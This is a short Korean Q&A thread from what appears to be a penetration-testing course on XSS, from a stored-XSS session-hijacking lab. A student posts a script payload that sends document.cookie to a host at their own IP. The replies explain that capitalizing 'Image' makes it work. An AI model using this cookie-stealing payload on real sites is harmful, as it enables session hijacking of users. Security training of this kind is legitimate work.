작성한 질문수
모의해킹 실무자가 알려주는, XSS 공격 기법
[실습6-2] STORED XSS를 통한 세션 하이재킹 공격 실습
작성
·
419
1
<script>new image().src='http://제아이피/xss_attack/session.php?data='+document.cookie</script>
location.href 스크립트는 성공했는데
했는데 new image().src는 세션값이 안넘어 옵니다...
혹시 자바1.8.0버전과 관련있을까요??
답변 2
0
앗.. 저도 이거 해결못해서 3일이나 보다가 찾았.. 습니다.
안녕하세요.
자바스크립트는 자바와 무관합니다.ㅎ
image() 에서 i를 대문자 I로 변경해서 해보세요.